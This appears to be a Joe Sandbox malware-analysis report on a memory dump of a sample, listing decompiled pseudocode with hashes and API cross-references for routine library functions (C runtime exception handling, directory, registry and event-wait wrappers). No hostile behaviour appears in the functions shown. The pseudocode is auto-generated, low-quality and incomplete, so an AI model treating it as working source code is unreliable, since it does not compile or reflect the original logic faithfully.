Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: ThreadLocalEventBuffer
API String ID: 17069307-137470936
Opcode ID: ce933c311fd9f7fccaffbe448a24f40c2ad45b3e221c39f2a98e81a9412d4b5e
Instruction ID: 8a547d72e69dc846749b9e0692d21d61ecd97fcd6507510646b2c2bca2fea26f
Opcode Fuzzy Hash: ce933c311fd9f7fccaffbe448a24f40c2ad45b3e221c39f2a98e81a9412d4b5e
Instruction Fuzzy Hash: F1419271A003089BDB10DFA5D882AAFB7B5AF84314F08842DE5069B352DB71ED05DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00D1425D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 47%

			E00D1425D(void* __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed char _a32) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				signed int _t46;
				void* _t52;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				intOrPtr* _t63;

				L00D14B7C(_a12);
				_pop(_t54);
				_t37 = L00D13D51(_t52, _t54, __edx, _t59, _t61);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L14:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L19:
								E00D145C4(_t58, _t58, _a8, _a12, _a16, _t55, _a32, _a24, _a28);
								goto L20;
							} else {
								_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t63 == 0) {
									goto L19;
								}
								 *0xd57000(_t58, _a8, _a12, _a16, _t55, _a24, _a28, _a32 & 0x000000ff);
								return  *_t63();
							}
						}
						_t46 =  *_t55 & 0x1fffffff;
						if(_t46 < 0x19930521 || _t55[7] == 0) {
							if(_t46 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
								goto L20;
							} else {
								goto L14;
							}
						} else {
							goto L14;
						}
					}
					if(_t55[1] != 0 && _a24 == 0) {
						L00D13F34(_a8, _a16, _t55);
					}
					goto L20;
				} else {
					L20:
					return 1;
				}
			}

0x00d14266
0x00d1426b
0x00d1426c
0x00d14271
0x00d14276
0x00d14286
0x00d142ae
0x00d142d9
0x00d142f9
0x00d142ff
0x00d1433b
0x00d1434f
0x00000000
0x00d1430c
0x00d1430f
0x00d14314
0x00000000
0x00000000
0x00d1432e
0x00000000
0x00d14336
0x00d142ff
0x00d142dd
0x00d142e4
0x00d142ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00d142e4
0x00d142b3
0x00d142c9
0x00d142ce
0x00000000
0x00d14357
0x00d14357
0x00000000
0x00d14359

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00D14266

Strings

csm, xrefs: 00D142F9
csm, xrefs: 00D14288

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 5ce009efd27ca257615fdff2b266da067b408e948bb5a805ea38569cf91a6630
Instruction ID: 843c07a3c3fc7134b5f92c6460ff427ebf95d3ae6ed1270d8f8f2e1545d996c5
Opcode Fuzzy Hash: 5ce009efd27ca257615fdff2b266da067b408e948bb5a805ea38569cf91a6630
Instruction Fuzzy Hash: 05319A32540219FBCF268F94E8449EA7B66FF09315B1C815AFD6849121CB32D8E2DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C994B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00C99513

Strings

3333, xrefs: 00C99551
3333, xrefs: 00C99558

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID: 3333$3333
API String ID: 4168288129-1524365199
Opcode ID: 2afa204a1342b6fee2f3c862703fc27929abc3fb3dcd2a70ea995cc8af8034f1
Instruction ID: 93d1b013753fe2bd2960ba35ffbc52ff9c3781808174664e8dc6d08bb24fe84c
Opcode Fuzzy Hash: 2afa204a1342b6fee2f3c862703fc27929abc3fb3dcd2a70ea995cc8af8034f1
Instruction Fuzzy Hash: 97213A32B106044BCF0AAA3D984512FF7A7EFD532074ECB2DD543E7654EA3199818682

Uniqueness

Uniqueness Score: -1.00%

Function 00CCC6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E00CCC6C0(void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a8) {
				void* _v16;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v40;
				char _v192;
				char _v200;
				intOrPtr _v204;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t21;
				char _t29;
				intOrPtr* _t30;
				intOrPtr* _t31;
				void* _t44;
				void* _t45;
				intOrPtr _t46;
				char* _t47;
				signed int _t49;

				_t60 = __fp0;
				_t44 = __edx;
				_t45 = __ecx;
				_t18 =  *0xd40014; // 0xfbddd969
				_v24 = _t18 ^ _t49;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0xa0], xmm0");
				asm("movdqa [esp+0x90], xmm0");
				asm("movdqa [esp+0x80], xmm0");
				asm("movdqa [esp+0x70], xmm0");
				asm("movdqa [esp+0x60], xmm0");
				asm("movdqa [esp+0x50], xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_v28 = 0xffffffff;
				_v32 = 0xffffffff;
				_t47 =  &_v192;
				L00CE1C10(_t47);
				_t21 = L00CE1C60(_t47, 0, 0x200);
				_t29 = __ecx + 4;
				__imp__TryAcquireSRWLockExclusive(_t29);
				if(_t21 == 0) {
					_t21 = L00CC8CF0(_t29, _t29, _t44, __eflags, __fp0);
				}
				_v200 = _t29;
				_t30 =  *((intOrPtr*)(_t45 + 0x14));
				if(_t30 != 0) {
					_v204 =  *((intOrPtr*)( *_t30 + 0x20));
					 *0xd57000();
					_t21 = _v204(_t47);
				}
				_t31 =  *((intOrPtr*)(_t45 + 0x18));
				_t46 =  *((intOrPtr*)(_t45 + 0x1c));
				while(_t31 != _t46) {
					_t21 = L00CD7F30(_t21,  *_t31, _t47);
					_t31 = _t31 + 4;
				}
				__imp__ReleaseSRWLockExclusive();
				_t48 =  &_v200;
				L00CE1CA0(_t21,  &_v200);
				E00CFE643(E00C90790(L00CE1D20( &_v200, _t44, _t60, "tracing/main_trace_log", _a8)), _t31, _v40 ^ _t49, _t44, _t46, _t48, _v200);
				return 1;
			}

0x00ccc6c0
0x00ccc6c0
0x00ccc6cf
0x00ccc6d1
0x00ccc6d8
0x00ccc6df
0x00ccc6e3
0x00ccc6ec
0x00ccc6f5
0x00ccc6fe
0x00ccc704
0x00ccc70a
0x00ccc710
0x00ccc716
0x00ccc71c
0x00ccc722
0x00ccc728
0x00ccc733
0x00ccc73e
0x00ccc744
0x00ccc752
0x00ccc757
0x00ccc75b
0x00ccc763
0x00ccc7e6
0x00ccc7e6
0x00ccc765
0x00ccc769
0x00ccc76e
0x00ccc775
0x00ccc779
0x00ccc782
0x00ccc782
0x00ccc786
0x00ccc789
0x00ccc78e
0x00ccc793
0x00ccc798
0x00ccc79b
0x00ccc7a3
0x00ccc7a9
0x00ccc7af
0x00ccc7d3
0x00ccc7e1

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,00000000,00000200), ref: 00CCC75B
ReleaseSRWLockExclusive.KERNEL32(?), ref: 00CCC7A3

Strings

tracing/main_trace_log, xrefs: 00CCC7B9

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: tracing/main_trace_log
API String ID: 17069307-566173763
Opcode ID: e2dce0f8b15e7fef2d2cbe7f901311a1648f79ccfa0255290799b87b1130ac59
Instruction ID: 6d8b5f43b42771aee847755a115e15b3a3bc450e236ba345021ed8c3038561cc
Opcode Fuzzy Hash: e2dce0f8b15e7fef2d2cbe7f901311a1648f79ccfa0255290799b87b1130ac59
Instruction Fuzzy Hash: 9F318F71A147C59BD7209F24C881B6EF7A1FFC9320F20471DF9D986281DBB09645CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0460 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00CC0460(void* __edx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _v16;
				signed int _v24;
				char _v96;
				char _v616;
				char _v622;
				short _v624;
				char _v636;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t23;
				WCHAR* _t29;
				signed int _t30;
				void* _t40;
				void* _t43;
				signed int _t44;
				signed int _t45;
				void* _t49;
				void* _t52;

				_t56 = __fp0;
				_t52 = __eflags;
				_t40 = __edx;
				_t13 =  *0xd40014; // 0xfbddd969
				_v24 = _t13 ^ _t44;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x250], xmm0");
				asm("movdqa [esp+0x240], xmm0");
				asm("movdqa [esp+0x230], xmm0");
				asm("movdqa [esp+0x220], xmm0");
				_t29 =  &_v616;
				L00CC4C80(_t29, "GetCurrentDirectoryW", "..\\..\\base\\files\\file_util_win.cc", 0x45b);
				L00CC9DD0(_t29,  &_v96, _t40, _t52, __fp0, _t29, 0);
				E00D011A0(_t41,  &_v622, 0xff, 0x206);
				_t49 = (_t45 & 0xfffffff0) - 0x270 + 0x1c;
				_v624 = 0;
				_t43 = GetCurrentDirectoryW(0x104, _t29) + 0xfffffefb;
				_t53 = _t43 - 0xfffffefc;
				if(_t43 >= 0xfffffefc) {
					_t23 = E00D133D4(_t29);
					_t41 = _t49 + 4;
					E00CBA860(_t29, _t49 + 4, _t49 + 4, _t43, _t53, __fp0, _t29, _t23);
					_t29 =  &_v636;
					E00CBB6D0(_t29, _t41, _t40, _t41, __fp0, _t29);
					E00CBA900(E00CBA900(E00CBA980(_a4, _t29), _t29), _t41);
				}
				_t30 = _t29 & 0xffffff00 | _t43 - 0xfffffefc >= 0x00000000;
				E00CFE643(L00CC9E30( &_v96, _t40, _t56), _t30, _v24 ^ _t44, _t40, _t41, _t43);
				return _t30;
			}

0x00cc0460
0x00cc0460
0x00cc0460
0x00cc046f
0x00cc0476
0x00cc047d
0x00cc0481
0x00cc048a
0x00cc0493
0x00cc049c
0x00cc04a5
0x00cc04b9
0x00cc04cb
0x00cc04df
0x00cc04e4
0x00cc04e7
0x00cc04fc
0x00cc0502
0x00cc0508
0x00cc050b
0x00cc0513
0x00cc0519
0x00cc051e
0x00cc0525
0x00cc053c
0x00cc053c
0x00cc0547
0x00cc055f
0x00cc056d

APIs

GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00CC04F4

Strings

..\..\base\files\file_util_win.cc, xrefs: 00CC04AE
GetCurrentDirectoryW, xrefs: 00CC04B3

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CurrentDirectory
String ID: ..\..\base\files\file_util_win.cc$GetCurrentDirectoryW
API String ID: 1611563598-3514530069
Opcode ID: 7eafbaf1f3739e7cbfb473ac593d9b1b538b02062615ab93efcf600d3c93cac7
Instruction ID: 55dedf86d05067dd5ecdd9bf4b8e642deef78b43dbf362db99780d3f145ae87b
Opcode Fuzzy Hash: 7eafbaf1f3739e7cbfb473ac593d9b1b538b02062615ab93efcf600d3c93cac7
Instruction Fuzzy Hash: 3F210772A143446BE220AB64DCC6FEFB358DFC8360F10062DF9C6561D3EFB4564892A6

Uniqueness

Uniqueness Score: -1.00%

Function 00CEF1B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CEF1B0(void** __ecx, void* __edx, void* __fp0) {
				void* _v16;
				signed int _v24;
				char _v104;
				char _v112;
				long _v128;
				char _v140;
				char _v144;
				char _v152;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t17;
				void* _t32;
				void** _t34;
				signed int _t35;
				signed int _t36;
				void* _t38;

				_t45 = __fp0;
				_t32 = __edx;
				_t38 = (_t36 & 0xfffffff0) - 0x90;
				_t34 = __ecx;
				_t15 =  *0xd40014; // 0xfbddd969
				_v24 = _t15 ^ _t35;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_v128 = 0xffffffff;
				_v144 = 0;
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x50], xmm0");
				asm("movdqa [esp+0x60], xmm0");
				asm("movdqa [esp+0x70], xmm0");
				_v112 = 0;
				_t33 =  &_v104;
				asm("pxor xmm0, xmm0");
				asm("movdqu [esp+0x38], xmm0");
				asm("movdqu [esp+0x48], xmm0");
				asm("movdqu [esp+0x58], xmm0");
				asm("movdqu [esp+0x68], xmm0");
				_t41 =  *((char*)(__ecx + 4));
				if( *((char*)(__ecx + 4)) != 0) {
					E00CC66F0( &_v140,  &_v140,  &_v104, _t41, L00CC4CB0(), __ecx);
					_v152 = 1;
					_t23 = _t38;
					L00CC4C80(_t38, "Wait", "..\\..\\base\\synchronization\\waitable_event_win.cc", 0x42);
					L00CC9E70(_t38,  &_v104, _t32, _t41, __fp0, _t23, 0);
					_v128 = 1;
				}
				_t17 = WaitForSingleObject( *_t34, 0xffffffff);
				if(_v112 != 0) {
					_t17 = L00CC9E30(_t33, _t32, _t45);
				}
				if(_v144 != 0) {
					_t17 = E00CC6220( &_v140, _t45);
				}
				return E00CFE643(_t17, _t23, _v24 ^ _t35, _t32, _t33, _t34);
			}

0x00cef1b0
0x00cef1b0
0x00cef1b9
0x00cef1bf
0x00cef1c1
0x00cef1c8
0x00cef1cf
0x00cef1d3
0x00cef1d9
0x00cef1e1
0x00cef1e6
0x00cef1ec
0x00cef1f2
0x00cef1f8
0x00cef1fe
0x00cef204
0x00cef209
0x00cef20d
0x00cef211
0x00cef217
0x00cef21d
0x00cef223
0x00cef229
0x00cef22d
0x00cef23c
0x00cef241
0x00cef246
0x00cef255
0x00cef262
0x00cef267
0x00cef267
0x00cef270
0x00cef27b
0x00cef27f
0x00cef27f
0x00cef289
0x00cef28f
0x00cef28f
0x00cef2a9

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CEF270

Strings

Wait, xrefs: 00CEF24F
..\..\base\synchronization\waitable_event_win.cc, xrefs: 00CEF24A

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: ObjectSingleWait
String ID: ..\..\base\synchronization\waitable_event_win.cc$Wait
API String ID: 24740636-2767331178
Opcode ID: 34de8ded350d96c641d8c166f1f5b59535fabac31f54fee69e88181dc96b1978
Instruction ID: 89208e6361fe21ff570c15cabdbab772718185270daf238133dd32ee33f6361e
Opcode Fuzzy Hash: 34de8ded350d96c641d8c166f1f5b59535fabac31f54fee69e88181dc96b1978
Instruction Fuzzy Hash: 70219171D187C196E320DB24C885B6BBBE4ABDA324F541B1DF5D056292DBF48688C393

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1720 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CD1720(void** __ecx, void* __eflags, short* _a4, char* _a8) {
				signed int _v20;
				char _v24;
				char _v40;
				int _v44;
				int _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				intOrPtr _t28;
				void** _t38;
				long _t39;
				signed int _t40;

				_t38 = __ecx;
				_t18 =  *0xd40014; // 0xfbddd969
				_v20 = _t18 ^ _t40;
				_v44 = 4;
				_v48 = 4;
				_v52 = 0;
				_v24 = 0xff;
				_t28 =  *((intOrPtr*)(__ecx));
				_t37 =  &_v40;
				L00CC4C80( &_v40, "ReadValue", "..\\..\\base\\win\\registry.cc", 0x1ad);
				E00CE5A40( &_v24,  &_v40, _t28, 1);
				_t36 =  &_v44;
				_t39 = RegQueryValueExW( *_t38, _a4, 0,  &_v44,  &_v52,  &_v48);
				_t24 = E00C90790(_t23);
				if(_t39 == 0) {
					_t24 = _v44 + 0xfffffffd;
					_t39 = 0x3f4;
					if(_v44 + 0xfffffffd <= 1 && _v48 == 4) {
						_t24 = _a8;
						 *_a8 = _v52;
						_t39 = 0;
					}
				}
				E00CFE643(_t24, _t28, _v20 ^ _t40, _t36, _t37, _t39);
				return _t39;
			}

0x00cd1729
0x00cd172b
0x00cd1732
0x00cd1735
0x00cd173c
0x00cd1743
0x00cd174a
0x00cd174e
0x00cd1750
0x00cd1763
0x00cd1772
0x00cd177d
0x00cd1790
0x00cd1795
0x00cd179c
0x00cd17a1
0x00cd17a4
0x00cd17ac
0x00cd17b4
0x00cd17ba
0x00cd17bc
0x00cd17bc
0x00cd17ac
0x00cd17c3
0x00cd17d1

APIs

RegQueryValueExW.ADVAPI32(FFFFFFFF,?,00000000,00000004,00000000,?,00000000,00000005,00000001), ref: 00CD178A

Strings

ReadValue, xrefs: 00CD175D
..\..\base\win\registry.cc, xrefs: 00CD1758

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: QueryValue
String ID: ..\..\base\win\registry.cc$ReadValue
API String ID: 3660427363-2708835790
Opcode ID: b79f5a473a26a571e2648e77133542e613ecf24a7854e5ee654f66674eaf503a
Instruction ID: 5fc6f6782b230173dc560442c0e013ed073cb3d02b08e1699df48b17a4dbcd99
Opcode Fuzzy Hash: b79f5a473a26a571e2648e77133542e613ecf24a7854e5ee654f66674eaf503a
Instruction Fuzzy Hash: AB116071A00219AFDB10DF98D885FEEB778EB49724F054219FA117B390D7716E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0570 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00CC0570(void* __eflags, void* __fp0, WCHAR* _a4) {
				void* _v16;
				signed int _v24;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				signed int _t17;
				signed int _t18;
				void* _t23;
				WCHAR* _t24;
				signed int _t26;
				signed int _t27;
				void* _t32;

				_t36 = __fp0;
				_t32 = __eflags;
				_t24 = _a4;
				_t9 =  *0xd40014; // 0xfbddd969
				_v24 = _t9 ^ _t26;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_t17 = (_t27 & 0xfffffff0) - 0x60;
				L00CC4C80(_t17, "SetCurrentDirectoryW", "..\\..\\base\\files\\file_util_win.cc", 0x46b);
				_t25 =  &_v96;
				L00CC9DD0(_t17,  &_v96, _t23, _t32, __fp0, _t17, 0);
				if(_t24[5] < 0) {
					_t24 =  *_t24;
				}
				_t18 = _t17 & 0xffffff00 | SetCurrentDirectoryW(_t24) != 0x00000000;
				E00CFE643(L00CC9E30(_t25, _t23, _t36), _t18, _v24 ^ _t26, _t23, _t24, _t25);
				return _t18;
			}

0x00cc0570
0x00cc0570
0x00cc057c
0x00cc057f
0x00cc0586
0x00cc058a
0x00cc058e
0x00cc0594
0x00cc059a
0x00cc05a0
0x00cc05a6
0x00cc05b8
0x00cc05c0
0x00cc05c9
0x00cc05d2
0x00cc05d4
0x00cc05d4
0x00cc05df
0x00cc05ef
0x00cc05fd

APIs

SetCurrentDirectoryW.KERNEL32(?,?,00000000), ref: 00CC05D7

Strings

..\..\base\files\file_util_win.cc, xrefs: 00CC05AD
SetCurrentDirectoryW, xrefs: 00CC05B2

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CurrentDirectory
String ID: ..\..\base\files\file_util_win.cc$SetCurrentDirectoryW
API String ID: 1611563598-2135964009
Opcode ID: e5836f024f1a96b98da95e918cdeb425c96343bf438bb88047ce344bd598f52e
Instruction ID: f3bb96b54f0c81dbc3bb3eb5878809b2222ce9117d73c08f140725bc75cd5a2b
Opcode Fuzzy Hash: e5836f024f1a96b98da95e918cdeb425c96343bf438bb88047ce344bd598f52e
Instruction Fuzzy Hash: 6601B572A143856BD3009B24CC46B6AF768EFD9720F10061EF9C192281EBB0A68482D2

Uniqueness

Uniqueness Score: -1.00%

Function 00CD5AD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00CD5ADE
GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00CD5AEA

Strings

GetHandleVerifier, xrefs: 00CD5AE4

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1646373207-1090674830
Opcode ID: 606ad5c2f8631d557b791b1a46c221d79d83dd534a8bef54be853c6dd22e61cf
Instruction ID: 83fcff142473cb7f350129fd43af3e35bedbd71ff32058957a9cde24da018e19
Opcode Fuzzy Hash: 606ad5c2f8631d557b791b1a46c221d79d83dd534a8bef54be853c6dd22e61cf
Instruction Fuzzy Hash: 61D05E32744B08BBD6801B99AD4AF29329C6700B13F480403F709D53D1CBE0D5908675

Uniqueness

Uniqueness Score: -1.00%

